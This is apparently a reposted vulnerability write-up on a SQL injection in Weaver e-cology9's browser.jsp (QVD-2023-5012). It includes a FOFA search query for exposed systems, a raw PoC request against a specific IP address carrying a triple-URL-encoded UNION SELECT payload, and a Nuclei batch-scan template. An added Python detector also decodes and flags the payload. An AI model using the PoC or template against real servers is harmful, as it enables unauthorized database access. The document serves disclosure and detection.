
泛微 (Weaver) E-cology9 browser.jsp SQL Injection Vulnerability QVD-2023-5012

Posted: 2023-09-04 16:13:20

Vulnerability overview

泛微 (Weaver) e-cology9 contains a SQL injection vulnerability; an attacker can exploit it to retrieve sensitive information from the database.

Affected versions

泛微 (Weaver) e-cology V9 < 10.56

Reproduction

FOFA query: app="泛微-协同商务系统"
Login page:

POC:

POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: 115.236.39.115:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 649

isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

The value of the keyword parameter is the following statement after three rounds of URL encoding:
a' union select 1,''+(SELECT @@VERSION)+'
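The three encoding layers are the detail a defender has to get right: a WAF or log-analysis rule that URL-decodes the keyword value once sees only another layer of percent escapes and never matches on "union select". The Python check below is an added example for this write-up; it is not code from the original post, from 泛微 e-cology, or from the Nuclei project. It decodes every form parameter repeatedly until the value stops changing, matches the fully decoded value against a few indicators for this injection shape, and also reports any parameter that needed more than one decoding pass, because ordinary clients encode once. The request body from the PoC above is embedded as the sample input; the benign body, the MAX_DECODE_DEPTH cap and the indicator patterns are constructed assumptions, tuned to this vulnerability rather than meant as a general WAF rule set.

```python
"""Iterative URL-decoding check for multi-encoded request parameters.

Added example for this write-up; not code from the original post, from
泛微 e-cology, or from the Nuclei project.
"""
import re
from urllib.parse import unquote

# Assumption: a small cap is enough; legitimate clients encode once, and the
# cap keeps pathological inputs from looping.
MAX_DECODE_DEPTH = 5

# Indicators for the payload shape in the write-up (a UNION SELECT whose
# result is string-concatenated back into a quoted value). Assumption: these
# are illustrative, not a general-purpose rule set.
SQLI_PATTERNS = {
    "union_select": re.compile(r"\bunion\s+select\b", re.IGNORECASE),
    "version_probe": re.compile(r"@@version", re.IGNORECASE),
    "concat_subselect": re.compile(r"'\s*\+\s*\(\s*select\b", re.IGNORECASE),
}


def fully_decode(value, max_depth=MAX_DECODE_DEPTH):
    """URL-decode `value` until it stops changing.

    Returns (decoded_value, passes_needed): a plain value reports 0, a value
    the client encoded once reports 1, the PoC's keyword reports 3.
    """
    current, depth = value, 0
    while depth < max_depth:
        decoded = unquote(current)
        if decoded == current:
            break
        current, depth = decoded, depth + 1
    return current, depth


def inspect_body(body, max_depth=MAX_DECODE_DEPTH):
    """Check each parameter of an application/x-www-form-urlencoded body.

    Splits on '&' and '=' without decoding first (parse_qs would already strip
    one layer and hide the depth). Returns one finding per parameter that
    either matches an indicator or needed more than one decoding pass.
    """
    findings = []
    for pair in body.split("&"):
        name, _, raw_value = pair.partition("=")
        decoded, depth = fully_decode(raw_value, max_depth)
        hits = sorted(k for k, p in SQLI_PATTERNS.items() if p.search(decoded))
        if hits or depth > 1:
            findings.append(
                {"param": name, "depth": depth, "decoded": decoded, "hits": hits}
            )
    return findings


# Sample input: the request body from the PoC above. The keyword value is the
# triple-encoded injection string, split here one original character per
# 15-byte group purely for readability.
POC_BODY = (
    "isDis=1&browserTypeId=269&keyword="
    "%2525%2536%2531%2525%2532%2537%2525%2532%2530"          # a'<space>
    "%2525%2537%2535%2525%2536%2565%2525%2536%2539"          # uni
    "%2525%2536%2566%2525%2536%2565%2525%2532%2530"          # on<space>
    "%2525%2537%2533%2525%2536%2535%2525%2536%2563"          # sel
    "%2525%2536%2535%2525%2536%2533%2525%2537%2534"          # ect
    "%2525%2532%2530%2525%2533%2531%2525%2532%2563"          # <space>1,
    "%2525%2532%2537%2525%2532%2537%2525%2532%2562"          # ''+
    "%2525%2532%2538%2525%2535%2533%2525%2534%2535"          # (SE
    "%2525%2534%2563%2525%2534%2535%2525%2534%2533"          # LEC
    "%2525%2535%2534%2525%2532%2530%2525%2534%2530"          # T<space>@
    "%2525%2534%2530%2525%2535%2536%2525%2534%2535"          # @VE
    "%2525%2535%2532%2525%2535%2533%2525%2534%2539"          # RSI
    "%2525%2534%2566%2525%2534%2565%2525%2532%2539"          # ON)
    "%2525%2532%2562%2525%2532%2537"                         # +'
)

# Constructed benign request: a once-encoded UTF-8 search term ("张三").
BENIGN_BODY = "isDis=1&browserTypeId=269&keyword=%E5%BC%A0%E4%B8%89"

if __name__ == "__main__":
    for label, body in (("PoC", POC_BODY), ("benign", BENIGN_BODY)):
        print(label, "full decode:", inspect_body(body))
        print(label, "single pass:", inspect_body(body, max_depth=1))
```

Run with max_depth=1 the same PoC body produces no finding, which is exactly the single-decode blind spot; with the default depth the keyword parameter is reported at depth 3 with all three indicators. Treat a depth above 1 as an anomaly to review rather than an automatic block, since some proxies and client libraries do double-encode legitimately.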

Nuclei batch-scan YAML template

id: CNVD-2023-12632

info:
  name: E-Cology V9 - SQL Injection
  author: daffainfo
  severity: high
  description: |
    Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.
  reference:
    - https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003
    - https://blog.csdn.net/qq_50854662/article/details/129992329
  metadata:
    max-request: 1
    verified: true
    fofa-query: app="泛微-协同商务系统"
    shodan-query: 'ecology_JSessionid'
  tags: cnvd,cnvd2023,ecology,sqli

# a' union select 1,''+(SELECT md5(9999999))+'
# URL encoded 3 times

http:
  - raw:
      - |
        POST /mobile/plugin/browser.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%33%35%25%32%35%25%33%32%25%33%38%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '283f42764da6dba2522412916b031080'
          - '"autoCount"'
          - '"autoGet"'
        condition: and

      - type: status
        status:
          - 200

From: https://www.cnblogs.com/pursue-security/p/17677330.html
